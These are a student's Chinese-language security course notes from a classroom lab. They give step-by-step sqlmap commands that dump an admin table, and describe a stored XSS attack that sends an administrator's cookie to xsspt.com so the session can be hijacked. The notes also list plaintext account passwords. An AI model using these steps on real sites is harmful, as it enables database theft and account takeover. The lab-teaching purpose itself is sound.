信息安全攻防课程笔记2018-11-27

老师的攻防网站:http://192.168.43.16/Type/?SortID=2

需连接老师的Wifi:TRT-TLIO

python2.7版本与3版本并存

创建虚拟环境

1、创建当前版本虚拟环境:mkvirtualenv bobbyvir

2、创建指定版本虚拟环境:mkvirtualenv --python=c:\python27\python.exe py2.7work

3、进入虚拟环境:workon py2.7work

4、退出虚拟环境:deactivate

5、删除虚拟环境:rmvirtualenv py2.7work

SQLmap:针对SQL没有做防注入攻击的情况。

http://testasp.vulnweb.com/有弱密码

攻防测试一(SQLMAP)

靶机:http://192.168.43.16/Type/?SortID=2

使用工具:sqlmap

按手册操作,最终获取admin账号的密码。

1.检查出是Microsoft Access数据库

(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent

2.获取表名

(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent --tables

3.获取列名

(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent -T admin --columns

4.获取数据

(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent -T admin --dump

攻防测试二(SQLMAP后提权)

攻防测试三(XSS实验):

靶机:192.168.43.235

管理员:admin,psw:bendss

利用www.xsspt.com网站的cookie获取功能

xsspt账号:snowd2002,psw:xxxnnnn2013cy

xsspt使用说明:1)创建项目;2)选默认模块;3)下一步,讲提示如何插入具体的代码。

如:

具体实验步骤:

1.找出管理员网址:

用WVS软件,扫描靶机,获取靶机的目录结构

信息安全攻防课程笔记2018-11-27_第1张图片

step1.png

发现目录为admin,入口为admin_login.asp

2.在靶机中植入木马:

靶机中有留言板,进行留言,并插入木马代码。

信息安全攻防课程笔记2018-11-27_第2张图片

step2.png

3.利用www.xsspt.com网站的cookie获取功能

登陆xsspt网站,当靶机管理员在后台访问过留言数据后,木马代码将会把管理员cookie发送到xsspt网站,进入xsspt网站点击刚建立的项目名称可以看到具体的cookie,有可能有多个cookie数值。

信息安全攻防课程笔记2018-11-27_第3张图片

step3.png

cookie中的名称为:ASPSESSIONIDASTTTTRB,数值=IPFJHGPCEMCLKOLIIKEDJGOA

4.使用cookie访问靶机:

使用chrome或firefox的web developer插件,输入刚才的cookie

信息安全攻防课程笔记2018-11-27_第4张图片

step4.png

完成后用chrome或firefox访问靶机192.168.43.235/admin,将会看到能进入管理员界面。

完成!!!

作者:学v思

链接:https://www.jianshu.com/p/8f3aa9e2f956

來源:

著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

你可能感兴趣的:(信息安全攻防课程笔记2018-11-27)